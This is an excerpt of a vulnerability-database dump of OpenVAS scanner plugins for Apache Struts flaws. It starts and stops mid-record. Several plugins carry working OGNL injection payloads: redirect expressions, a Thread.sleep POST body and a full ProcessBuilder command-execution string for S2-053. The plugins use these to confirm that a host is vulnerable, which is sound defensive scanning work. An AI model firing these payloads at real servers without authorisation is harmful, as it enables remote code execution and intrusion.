http_get(item:string(dir,\"/showcase.action\"), port:asport);\nasres = http_keepalive_send_recv(port:asport, data:asreq);\n\nif(asres && \">Struts2 Showcase<\" >< asres && \">Welcome!<\" >< asres)\n{\n calc = make_list(2, 3);\n\n foreach i (calc)\n {\n url = dir + \"/showcase.action?redirect%3A%25%7B\"+ i +\"*5%7D\";\n\n req = http_get(item:url, port:asport);\n res = http_keepalive_send_recv(port:asport, data:req);\n\n if(res =~ \"HTTP/1.. 302\" && res =~ \"Location:.*/([0-9]+)?\")\n {\n result = eregmatch(pattern: string(dir, \"/([0-9]+)?\"), string:res);\n\n if ( !result || result[1] >!< i * 5 ) exit(0);\n }\n else exit(0);\n }\n security_message(port:asport);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T17:27:36", "description": "This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.", "cvss3": {}, "published": "2013-07-23T00:00:00", "type": "openvas", "title": "Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities (S2-013, S2-014)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310803837", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803837", "sourceData": "# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803837\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-07-23 17:54:59 +0530 (Tue, 23 Jul 2013)\");\n script_name(\"Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities (S2-013, S2-014)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53553\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/25980\");\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-013\");\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-014\");\n script_xref(name:\"URL\", value:\"http://metasploit.org/modules/exploit/multi/http/struts_include_params\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data like system functions\n via HTTP POST request and check whether it is executing the java function or not.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to improper handling of the\n includeParams attribute in the URL and Anchor tags\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers\n to execute arbitrary commands via specially crafted OGNL (Object-Graph Navigation Language)\n expressions.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - Struts 2.3.14.1.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to at least Struts 2.3.14.2.\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!port = get_app_port(cpe:CPE, service:\"www\"))\n exit(0);\n\nif(!dir = get_app_location(cpe:CPE, port:port))\n exit(0);\n\nif(dir == \"/\")\n dir = \"\";\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:port);\n\nreq = http_get(item:dir + \"/example/HelloWorld.action\", port:port);\nres = http_keepalive_send_recv(port:port, data:req);\n\nif(res && \">Struts\" >< res && \">English<\" >< res)\n{\n sleep = make_list(3, 5);\n\n url = dir + \"/struts2-blank/example/HelloWorld.action\";\n foreach i (sleep)\n {\n postdata = \"fgoa=%24%7b%23%5fmemberAccess%5b%22allow\" +\n \"StaticMethodAccess%22%5d%3dtrue%2c%40jav\" +\n \"a.lang.Thread%40sleep%28\" + i + \"000%29%7d\";\n\n req = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n\n start = unixtime();\n http_send_recv(port:port, data:req);\n stop = unixtime();\n\n if(stop - start < i || stop - start > (i+5)) exit(99); # not vulnerable\n }\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-15T13:08:51", "description": "This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.", "cvss3": {}, "published": "2013-07-23T00:00:00", "type": "openvas", "title": "Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2018-01-11T00:00:00", "id": "OPENVAS:803837", "href": "http://plugins.openvas.org/nasl.php?oid=803837", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts2_java_method_exec_vuln.nasl 8373 2018-01-11 10:29:41Z cfischer $\n#\n# Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_id(803837);\n script_version(\"$Revision: 8373 $\");\n script_cve_id(\"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-11 11:29:41 +0100 (Thu, 11 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-23 17:54:59 +0530 (Tue, 23 Jul 2013)\");\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_name(\"Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send a crafted data like system functions\n via HTTP POST request and check whether it is executing the java function or not.\");\n\n script_tag(name: \"insight\" , value:\"Flaw is due to improper handling of the\n includeParams attribute in the URL and Anchor tags\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow remote attackers\n to execute arbitrary commands via specially crafted OGNL (Object-Graph Navigation Language)\n expressions.\n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Apache Struts 2 before 2.3.14.2\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Apache Struts 2 version 2.3.14.2 or later,\n For updates refer to http://struts.apache.org\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/53553\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/25980\");\n script_xref(name : \"URL\" , value : \"https://cwiki.apache.org/confluence/display/WW/S2-013\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/development/2.x/docs/s2-014.html\");\n script_xref(name : \"URL\" , value : \"http://metasploit.org/modules/exploit/multi/http/struts_include_params\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Variable Initialization\nasport = 0;\nasreq = \"\";\nasres = \"\";\nasRes = \"\";\nasReq = \"\";\ndir = \"\";\nurl = \"\";\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nhost = http_host_name(port:asport);\n\n## Send and Receive the response\nasreq = http_get(item:string(dir,\"/example/HelloWorld.action\"), port:asport);\nasres = http_keepalive_send_recv(port:asport, data:asreq);\n\n## Confirm the application\nif(asres && \">Struts\" >< asres && \">English<\" >< asres)\n{\n sleep = make_list(3, 5);\n\n foreach i (sleep)\n {\n ## Construct the POST data\n postdata = \"fgoa=%24%7b%23%5fmemberAccess%5b%22allow\"+\n \"StaticMethodAccess%22%5d%3dtrue%2c%40jav\"+\n \"a.lang.Thread%40sleep%28\"+ i +\"000%29%7d\";\n\n ## Construct the POST request\n asReq = string(\"POST /struts2-blank/example/HelloWorld.action HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n\n start = unixtime();\n asRes = http_send_recv(port:asport, data:asReq);\n stop = unixtime();\n\n if(stop - start < i || stop - start > (i+5)) exit(0); # not vulnerable\n }\n security_message(port:asport);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-08-30T12:58:34", "description": "ClassLoader Manipulation allows remote attackers to execute\n arbitrary Java code.", "cvss3": {}, "published": "2019-08-28T00:00:00", "type": "openvas", "title": "Apache Struts ClassLoader Manipulation Vulnerabilities (S2-021) (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0113", "CVE-2014-0112"], "modified": "2019-08-29T00:00:00", "id": "OPENVAS:1361412562310108628", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108628", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108628\");\n script_version(\"2019-08-29T07:36:00+0000\");\n script_bugtraq_id(67064, 67081);\n script_cve_id(\"CVE-2014-0112\", \"CVE-2014-0113\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-29 07:36:00 +0000 (Thu, 29 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-28 07:41:10 +0000 (Wed, 28 Aug 2019)\");\n script_name(\"Apache Struts ClassLoader Manipulation Vulnerabilities (S2-021) (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-021\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/67064\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/67081\");\n\n script_tag(name:\"summary\", value:\"ClassLoader Manipulation allows remote attackers to execute\n arbitrary Java code.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts 2.3.20 or later.\");\n\n script_tag(name:\"insight\", value:\"The excluded parameter pattern introduced in version 2.3.16.1 to block\n access to getClass() method wasn't sufficient. It is possible to omit that with specially crafted requests.\n Also CookieInterceptor is vulnerable for the same kind of attack when it was configured to accept all\n cookies (when '*' is used to configure cookiesName param).\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - Struts 2.3.16.3.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker can execute arbitrary Java code via crafted\n parameters.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\nif(vers !~ \"^2\\.[0-3]\\.\")\n exit(99);\n\nif(version_in_range(version:vers, test_version:\"2.0.0\", test_version2:\"2.3.16.3\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2.3.20\", install_path:infos[\"location\"]);\n security_message(data:report, port:port);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-30T12:58:34", "description": "ClassLoader Manipulation allows remote attackers to execute\n arbitrary Java code.", "cvss3": {}, "published": "2019-08-28T00:00:00", "type": "openvas", "title": "Apache Struts ClassLoader Manipulation Vulnerabilities (S2-021) (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0113", "CVE-2014-0112"], "modified": "2019-08-29T00:00:00", "id": "OPENVAS:1361412562310108629", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108629", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108629\");\n script_version(\"2019-08-29T07:36:00+0000\");\n script_bugtraq_id(67064, 67081);\n script_cve_id(\"CVE-2014-0112\", \"CVE-2014-0113\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-29 07:36:00 +0000 (Thu, 29 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-28 07:41:10 +0000 (Wed, 28 Aug 2019)\");\n script_name(\"Apache Struts ClassLoader Manipulation Vulnerabilities (S2-021) (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-021\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/67064\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/67081\");\n\n script_tag(name:\"summary\", value:\"ClassLoader Manipulation allows remote attackers to execute\n arbitrary Java code.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts 2.3.20 or later.\");\n\n script_tag(name:\"insight\", value:\"The excluded parameter pattern introduced in version 2.3.16.1 to block\n access to getClass() method wasn't sufficient. It is possible to omit that with specially crafted requests.\n Also CookieInterceptor is vulnerable for the same kind of attack when it was configured to accept all\n cookies (when '*' is used to configure cookiesName param).\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - Struts 2.3.16.3.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker can execute arbitrary Java code via crafted\n parameters.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\nif(vers !~ \"^2\\.[0-3]\\.\")\n exit(99);\n\nif(version_in_range(version:vers, test_version:\"2.0.0\", test_version2:\"2.3.16.3\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2.3.20\", install_path:infos[\"location\"]);\n security_message(data:report, port:port);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:17", "description": "This host is running Apache Struts and is\n prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-06-06T00:00:00", "type": "openvas", "title": "Apache Struts Multiple Vulnerabilities June16", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2162", "CVE-2016-4003", "CVE-2016-3093"], "modified": "2018-10-18T00:00:00", "id": "OPENVAS:1361412562310808021", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808021", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_mult_vuln_june16.nasl 58255 2016-06-06 11:03:24 +0530 June$\n#\n# Apache Struts Multiple Vulnerabilities June16\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808021\");\n script_version(\"$Revision: 11969 $\");\n script_cve_id(\"CVE-2016-4003\", \"CVE-2016-2162\", \"CVE-2016-3093\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-18 16:53:42 +0200 (Thu, 18 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-06 11:03:24 +0530 (Mon, 06 Jun 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Apache Struts Multiple Vulnerabilities June16\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist as,\n\n - The Apache Struts frameworks when forced, performs double evaluation of\n attributes' values assigned to certain tags so it is possible to pass in\n a value that will be evaluated again when a tag's attributes will be\n rendered.\n\n - The interceptor doesn't perform any validation of the user input and accept\n arbitrary string which can be used by a developer to display language\n selected by the user.\n\n - The application does not properly validate cache method references when used\n with OGNL before 3.0.12\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to inject arbitrary web script or HTML via multi-byte characters\n in a url-encoded parameter or a denial of service (block access to a web site)\n via unspecified vectors.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Version 2.x through 2.3.24.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts Version 2.3.28 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://struts.apache.org/docs/s2-030.html\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/docs/s2-028.html\");\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-034.html\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n\n## Vulnerable version according to Advisory\nif(version_in_range(version:appVer, test_version:\"2.0.0\", test_version2:\"2.3.24.1\"))\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"2.3.28\");\n security_message(data:report, port:appPort);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-05-08T18:42:16", "description": "Apache Struts is prone to a remote code-execution vulnerability.", "cvss3": {}, "published": "2017-09-11T00:00:00", "type": "openvas", "title": "Apache Struts 'CVE-2017-12611' Remote Code Execution Vulnerability (S2-053)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12611"], "modified": "2020-05-06T00:00:00", "id": "OPENVAS:1361412562310108243", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108243", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108243\");\n script_version(\"2020-05-06T06:57:16+0000\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 06:57:16 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-11 12:00:00 +0200 (Mon, 11 Sep 2017)\");\n script_cve_id(\"CVE-2017-12611\");\n script_name(\"Apache Struts 'CVE-2017-12611' Remote Code Execution Vulnerability (S2-053)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\", \"global_settings/disable_generic_webapp_scanning\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-053\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow an attacker to execute arbitrary\n code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP GET request.\n\n NOTE: This script needs to check every parameter of a web application with various crafted requests. This is a\n time-consuming process and this script won't run by default. If you want to check for this vulnerability please\n enable 'Enable generic web application scanning' within the script preferences of the NVT 'Global variable\n settings (OID: 1.3.6.1.4.1.25623.1.0.12288)'.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts 2.3.34, 2.5.12 or later.\");\n\n script_tag(name:\"summary\", value:\"Apache Struts is prone to a remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - 2.3.33\n\n Struts 2.5 - 2.5.10.1.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"url_func.inc\");\n\n# nb: We also don't want to run if optimize_test is set to \"no\"\nif( http_is_cgi_scan_disabled() ||\n get_kb_item( \"global_settings/disable_generic_webapp_scanning\" ) )\n exit( 0 );\n\nport = http_get_port( default:80 );\nhost = http_host_name( dont_add_port:TRUE );\n\ncgis = http_get_kb_cgis( port:port, host:host );\nif( ! cgis )\n exit( 0 );\n\nforeach cgi( cgis ) {\n\n cgiArray = split( cgi, sep:\" \", keep:FALSE );\n\n cmds = exploit_commands();\n\n foreach cmd( keys( cmds ) ) {\n\n c = \"{'\" + cmds[ cmd ] + \"'}\";\n\n ex = \"%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):\" +\n \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.\" +\n \"opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().\" +\n \"clear()).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder(\" + c + \")).\" +\n \"(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}\";\n\n urls = http_create_exploit_req( cgiArray:cgiArray, ex:urlencode( str:ex ) );\n foreach url( urls ) {\n\n req = http_get_req( port:port, url:url );\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( egrep( pattern:cmd, string:buf ) ) {\n report = 'It was possible to execute the command `' + cmds[ cmd ] + '` on the remote host.\\n\\nRequest:\\n\\n' + req + '\\n\\nResponse:\\n\\n' + buf;\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n }\n}\n\nsoc = open_sock_tcp( port );\nif( ! soc )\n exit( 0 );\n\nforeach cgi( cgis ) {\n\n if( host_runs( \"Windows\" ) == \"yes\" ) {\n cleancmd = \"ping -n 3 \" + this_host();\n pingcmd = '\"ping\",\"-n\",\"3\",\"' + this_host() + '\"';\n win = TRUE;\n } else {\n vtstrings = get_vt_strings();\n check = vtstrings[\"ping_string\"];\n pattern = hexstr( check );\n cleancmd = \"ping -c 3 -p \" + pattern + \" \" + this_host();\n pingcmd = '\"ping\",\"-c\",\"3\",\"-p\",\"' + pattern + '\",\"' + this_host() + '\"';\n 